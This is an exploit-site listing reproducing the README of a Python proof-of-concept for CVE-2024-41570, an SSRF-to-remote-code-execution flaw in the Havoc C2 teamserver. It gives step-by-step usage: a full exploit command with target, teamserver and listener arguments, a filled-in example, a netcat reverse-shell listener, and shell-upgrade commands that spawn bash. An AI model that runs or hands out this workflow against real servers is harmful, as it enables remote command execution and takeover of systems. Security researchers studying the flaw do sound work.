Exploit for CVE-2024-41570

Name: Exploit for CVE-2024-41570
Rating: 5 (128 reviews)
2025-01-21 | CVSS 9.8
## https://sploitus.com/exploit?id=8F3EF3F5-8D9C-511D-9A32-A07E8B9C1717
# CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

## Features
- Registers an agent to the target service.
- Opens a WebSocket and sends handshake and authentication payloads.
- Executes commands remotely via a reverse shell.
- Provides a guided workflow with clear instructions.

## Prerequisites
- Python 3.x installed on your machine.
- Install required dependencies by running:
  ```bash
  pip install -r requirements.txt
  ```

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/<your-repo-name>.git
   ```
2. Navigate to the project directory:
   ```bash
   cd CVE-2024-41570
   ```
3. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```

## Usage
Run the script with the required arguments:

```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```

### Arguments
- `-t`: Target URL of the WebSocket server.
- `-i`: IP address of the Team Server form Havoc.
- `-p`: Port for the Team Server from Havoc.
- `-U`: Username for WebSocket authentication.
- `-P`: Password for WebSocket authentication.
- `-l`: Listener IP for the reverse shell (your machine).
- `-L`: Listener port for the reverse shell (your machine).

### Example Command
```bash
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
```

### Steps to Execute
1. Ensure the target service is running and vulnerable.
2. Run the script with the required parameters.
3. In a separate terminal, start a listener:
   ```bash
   nc -lvnp <listener_port>
   ```
4. Upgrade shell:
    ```
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    ```
## Dependencies
The script requires the following Python libraries:
- `requests`
- `pycryptodome`

Install them using the command:
```bash
pip install -r requirements.txt
```

## Security Notice
This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

## References
Inspired by [Default Havoc Poc](https://github.com/chebuya/Havoc-C2-SSRF-poc)

## Contributing
Contributions are welcome! Feel free to fork the repository and submit a pull request.

## License
This project is licensed under the MIT License. See the LICENSE file for details.